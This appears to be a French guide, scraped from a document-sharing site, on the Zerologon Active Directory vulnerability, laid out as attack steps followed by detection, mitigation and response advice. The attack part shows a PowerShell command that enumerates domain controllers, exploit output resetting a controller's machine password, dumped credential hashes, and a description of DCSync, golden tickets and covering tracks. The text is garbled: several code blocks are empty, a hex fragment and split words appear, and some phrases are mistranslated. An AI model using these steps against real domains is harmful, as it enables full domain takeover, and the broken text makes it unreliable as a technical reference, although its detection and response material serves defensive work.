Académique Documents
Professionnel Documents
Culture Documents
Le 11 septembre 2020, les chercheurs de Secura ont annoncé une nouvelle vulnérabilité
qu’ils ont nommée Zerologon. Zerologon permet à un attaquant non authentifié
d’escalader à distance ses privilèges à Domain Admin, avec l’accès réseau à un
contrôleur de domaine comme seule exigence. Chaque organisation exécutant Active
Directory était vulnérable à cet exploit.
DIFFICULTÉ
Détection: Douleur moyenne
Atténuation: Bas
Réponse: Dur
ÉTAPE 1
Code:
# Non-Encoded Command
# Encoded Command
ÉTAPE 2
Code:
PowerShell
/powershellcommand:"[DirectoryServices.ActiveDirectory.Domain]::GetC
urrentDomain().DomainControllers | Select Name, OSVersion"
ÉTAPE 3
Code:
Sortie:
Remote : sbl-basalt2
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
Target : sbl-basalt2
Account: sbl-basalt2$
Type : 6 (Server)
Mode : exploit
Trying to 'authenticate'...
====================================================================
====================================================================
==============================
NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000
* Authentication: OK -- vulnerable
Terminer l’attaque
L’exécution de la commande ci-dessus aura réinitialisé le mot de passe du compte
d’ordinateur du contrôleur de domaine à une valeur null. Il est important de noter que
seul le mot de passe du compte d’ordinateur dans Active Directory a été réinitialisé ; Le
contrôleur de domaine tentera toujours d’utiliser son ancien mot de passe pour
répliquer les modifications, ce qui échouera.
L’adversaire peut désormais utiliser ce compte d’ordinateur (et les privilèges qui lui sont
attribués) pour compromettre davantage Active Directory. Par exemple, ils peuvent
utiliser ces informations d’identification pour mener une attaque DCSync afin de
répliquer le hachage du mot de passe KRBTGT et les tickets d’or de la monnaie. Ensuite,
l’adversaire peut couvrir ses traces en exécutant la commande lsadump::p ostzerologon
pour restaurer le contrôleur de domaine à l’état opérationnel.
Code:
Sortie:
[AUTH] Domain : ba
[AUTH] Password:
Credentials:
ntlm- 0: 75557a32b7c51e11361ab752eb9720da
lm - 0: cf591b998a49fa934e3fb0dde45c75ff
Credentials
aes256_hmac (4096) :
13d99f13f9f984b8af7779f97e9b096897b7d79653369c46dddc9fb6b17c806b
Target : 10.154.202.2
Account: sbl-basalt2$
* SAM information
Domain name : BA
Détecter,
d98c1dd4 04b2008f 980980e9 7e42f8ec
Détection à l’aide de la capture de paquets réseau
La surveillance du réseau peut également être utilisée pour détecter les tentatives
d’exploitation de la vulnérabilité Zerologon. Surveillez le trafic Netlogon pour l’opération
NetrServerAuthenticate2 où les informations d’identification du client sont toutes des
zéros. Par exemple, dans Wireshark, le filtre d’affichage affichera ce trafic.
atténuer
Difficulté: Bas
Si des contrôleurs de domaine fonctionnent toujours sur une version non prise
en charge (et donc non corrigée) de Windows (2008R2 et versions antérieures),
isolez-les et prévoyez de les mettre à niveau ou de les remplacer. Si des
exigences techniques empêchent la mise à niveau vers des versions prises en
charge, des domaines distincts doivent être utilisés pour ces systèmes hérités.
et réagir
Difficulté: Dur
Si un adversaire a réussi à exploiter Zerologon, alors une compromission
complète d’Active Directory doit être présumée. Des preuves supplémentaires de
tentatives de compromission du fichier NTDS.dit ou d’utilisation de la technique
DCSync doivent être attendues. Vous devez activer le processus de réponse aux
incidents et alerter l’équipe d’intervention.
LECTURES CONNEXES
Script
de test Zerologon Invoke-ZeroLogon